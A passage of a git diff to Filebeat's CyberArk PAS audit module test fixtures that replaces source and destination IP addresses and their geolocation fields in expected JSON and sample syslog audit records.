-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -366,7 +363,7 @@
         "cyberarkpas.audit.message": "Logoff",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:12:20",
         "event.action": "logoff",
         "event.category": [
@@ -386,29 +383,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3783,
+        "log.offset": 3782,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMP_ADB_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -424,7 +418,7 @@
         "cyberarkpas.audit.message": "Logoff",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:12:27",
         "event.action": "logoff",
         "event.category": [
@@ -444,29 +438,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4344,
+        "log.offset": 4342,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPGW_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -482,7 +473,7 @@
         "cyberarkpas.audit.message": "Logoff",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:27",
         "event.action": "logoff",
         "event.category": [
@@ -502,28 +493,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4903,
+        "log.offset": 4900,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -534,25 +523,22 @@
         "@timestamp": "2021-03-11T17:38:13.000Z",
         "cyberarkpas.audit.action": "Logoff",
         "cyberarkpas.audit.desc": "Logoff",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:13Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Logoff",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:13",
-        "destination.address": "81.32.170.205",
-        "destination.geo.city_name": "Barcelona",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 41.3891,
-        "destination.geo.location.lon": 2.1611,
-        "destination.geo.region_iso_code": "ES-B",
-        "destination.geo.region_name": "Barcelona",
-        "destination.ip": "81.32.170.205",
+        "destination.address": "67.43.156.14",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.14",
         "event.action": "logoff",
         "event.category": [
             "authentication",
@@ -571,7 +557,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5447,
+        "log.offset": 5443,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -580,7 +566,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "127.0.0.1",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
@@ -598,25 +584,22 @@
         "@timestamp": "2021-03-11T17:48:28.000Z",
         "cyberarkpas.audit.action": "Logoff",
         "cyberarkpas.audit.desc": "Logoff",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:28Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Logoff",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 09:48:28",
-        "destination.address": "81.32.170.205",
-        "destination.geo.city_name": "Barcelona",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 41.3891,
-        "destination.geo.location.lon": 2.1611,
-        "destination.geo.region_iso_code": "ES-B",
-        "destination.geo.region_name": "Barcelona",
-        "destination.ip": "81.32.170.205",
+        "destination.address": "67.43.156.14",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.14",
         "event.action": "logoff",
         "event.category": [
             "authentication",
@@ -635,7 +618,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6833,
+        "log.offset": 6827,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -644,7 +627,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.2.2",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
@@ -665,10 +648,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:49:06Z",
         "cyberarkpas.audit.issuer": "PSMPGW_VAGRANT",
         "cyberarkpas.audit.message": "Logoff",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:49:06</Timestamp>\n    <IsoTimestamp>2021-03-11T17:49:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:49:06</Timestamp>\n    <IsoTimestamp>2021-03-11T17:49:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:49:06",
         "event.action": "logoff",
         "event.category": [
@@ -688,29 +671,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8217,
+        "log.offset": 8209,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPGW_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -724,10 +704,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:20Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Logoff",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:20</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:20</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:20",
         "event.action": "logoff",
         "event.category": [
@@ -747,26 +727,29 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9587,
+        "log.offset": 9577,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -777,22 +760,25 @@
         "@timestamp": "2021-03-14T13:49:36.000Z",
         "cyberarkpas.audit.action": "Logoff",
         "cyberarkpas.audit.desc": "Logoff",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:36Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Logoff",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:36</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:36</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:36",
-        "destination.address": "34.71.250.247",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "34.71.250.247",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "logoff",
         "event.category": [
             "authentication",
@@ -811,7 +797,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 10955,
+        "log.offset": 10941,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -819,23 +805,20 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log
index f3062f7ea56c..856d8c700c23 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log
@@ -1,4 +1,4 @@
 <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
-<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
+<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
 <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 11:45:26</Timestamp>\n    <IsoTimestamp>2021-03-11T19:45:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>98</MessageID>\n    <Desc>Open File (Write Only)</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Open File (Write Only)</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PVWAConfig</Safe>\n    <File>Root\\PVConfiguration.xml</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Open File (Write Only)</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json
index 57a5e57e9ee5..514ec522b1cd 100644
